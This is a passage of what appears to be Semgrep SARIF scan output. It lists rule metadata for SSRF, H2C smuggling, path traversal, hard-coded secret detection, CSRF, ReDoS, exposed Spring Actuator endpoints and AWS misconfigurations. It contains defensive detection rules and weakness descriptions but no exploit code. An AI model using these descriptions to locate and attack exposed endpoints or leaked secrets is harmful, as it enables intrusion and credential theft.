CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","id":"javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","name":"javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers."},"help":{"markdown":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling)\n - [https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c](https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c)\n","text":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","id":"generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","name":"generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","properties":{"precision":"very-high","tags":["CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"help":{"markdown":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.crypto.insecure-hash.insecure-hash)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.crypto.insecure-hash.insecure-hash","id":"cpp.lang.security.crypto.insecure-hash.insecure-hash","name":"cpp.lang.security.crypto.insecure-hash.insecure-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.crypto.insecure-hash.insecure-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal."},"help":{"markdown":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine)\n - [https://www.praetorian.com/blog/pathcombine-security-issues-in-aspnet-applications/](https://www.praetorian.com/blog/pathcombine-security-issues-in-aspnet-applications/)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine?view=net-6.0#remarks](https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine?view=net-6.0#remarks)\n","text":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","id":"csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","name":"csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","id":"javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","name":"javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","id":"ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","name":"ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none)\n - [https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware](https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware)\n - [https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions](https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","id":"csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","name":"csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies."},"help":{"markdown":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage)\n - [https://www.npmjs.com/package/csurf](https://www.npmjs.com/package/csurf)\n - [https://www.npmjs.com/package/csrf](https://www.npmjs.com/package/csrf)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","id":"javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","name":"javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access."},"help":{"markdown":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_without_protection.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_without_protection.rb)\n - [https://www.acunetix.com/vulnerabilities/web/rails-mass-assignment/](https://www.acunetix.com/vulnerabilities/web/rails-mass-assignment/)\n","text":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","id":"ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","name":"ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined."},"help":{"markdown":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace)\n - [https://github.com/returntocorp/semgrep-rules/issues/518](https://github.com/returntocorp/semgrep-rules/issues/518)\n","text":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","id":"go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","name":"go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","properties":{"precision":"very-high","tags":["CWE-913: Improper Control of Dynamically-Managed Code Resources","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS."},"help":{"markdown":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n","text":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","id":"javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","name":"javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data"},"help":{"markdown":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid)\n - [https://docs.djangoproject.com/en/4.2/ref/forms/api/#accessing-clean-data](https://docs.djangoproject.com/en/4.2/ref/forms/api/#accessing-clean-data)\n","text":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data"},"helpUri":"https://semgrep.dev/r/python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","id":"python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","name":"python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk."},"help":{"markdown":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled)\n - [https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-features.html#production-ready-endpoints-exposing-endpoints](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-features.html#production-ready-endpoints-exposing-endpoints)\n - [https://medium.com/walmartglobaltech/perils-of-spring-boot-actuators-misconfiguration-185c43a0f785](https://medium.com/walmartglobaltech/perils-of-spring-boot-actuators-misconfiguration-185c43a0f785)\n - [https://blog.maass.xyz/spring-actuator-security-part-1-stealing-secrets-using-spring-actuators](https://blog.maass.xyz/spring-actuator-security-part-1-stealing-secrets-using-spring-actuators)\n","text":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk."},"helpUri":"https://semgrep.dev/r/java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","id":"java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","name":"java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","id":"python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","name":"python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information."},"help":{"markdown":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","id":"terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","name":"terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Square OAuth Secret detected"},"help":{"markdown":"Square OAuth Secret detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret)\n - [https://github.com/Yelp/detect-secrets/blob/master/tests/plugins/square_oauth_test.py](https://github.com/Yelp/detect-secrets/blob/master/tests/plugins/square_oauth_test.py)\n","text":"Square OAuth Secret detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","id":"generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","name":"generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS Workspace user volume is unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"help":{"markdown":"The AWS Workspace user volume is unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS Workspace user volume is unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","id":"terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","name":"terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery 